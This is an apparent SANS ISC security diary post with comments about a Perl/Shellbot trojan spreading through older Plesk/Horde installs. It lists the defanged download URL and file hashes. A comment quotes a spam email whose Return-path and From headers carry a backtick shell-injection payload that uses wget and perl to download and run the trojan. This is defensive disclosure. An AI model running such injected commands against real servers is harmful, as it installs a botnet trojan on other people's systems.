Active Perl/Shellbot Trojan

ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on Virustotal [2] and the script contains a “hostauth” of sosick[.]net[3] and the IRC server where the compromised systems are connecting to is located at What we have so far, it appears it is exploiting older version of Plesk.

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png



Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


528 Posts
ISC Handler
Oct 26th 2013
I received an interesting attempt to infect my mailserver with the Shellbot Trojan. The command to download and execute the trojan is sent as subject line and as reply to.

I have no idea, how that command shall be executed, at least my postfix didn't execute it. Since the mail is sent to postmaster@localhost (I received the mail, because it was identified as spam and redirected), the intended target is not the mail client.

Find attached the mail including headers (two header lines with only local information removed):

Return-path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
Received: from localhost (localhost [])
by (Postfix) with ESMTP id 6E6AB482E1
for <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)
X-Envelope-To: <postmaster@localhost>
X-Envelope-To-Blocked: <postmaster@localhost>
X-Quarantine-ID: <xxtP22xJWX7m>
X-Amavis-Alert: BAD HEADER SECTION Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 5.47
X-Spam-Level: *****
X-Spam-Status: Yes, score=5.47 tag=2 tag2=5 kill=5 tests=[BAYES_40=-0.001,
Received: from ([])
by localhost ( []) (amavisd-new, port 10024)
with ESMTP id xxtP22xJWX7m for <postmaster@localhost>;
Mon, 4 Nov 2013 16:58:07 +0100 (CET)
Received: from domain.local (unknown [])
by (Postfix) with ESMTP id 185F9482CB
for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`

The way that this is happening is through the plesk vulnerability in the about article. It may affect more than just plesk related systems but all systems using horde. They can execute it via the login screen. Take a look at this I've dealt a lot with these, if you need more assistance with this particular issue, you can always email me directly at, or
Zach W

10 Posts

Sign Up for Free or Log In to start participating in the conversation!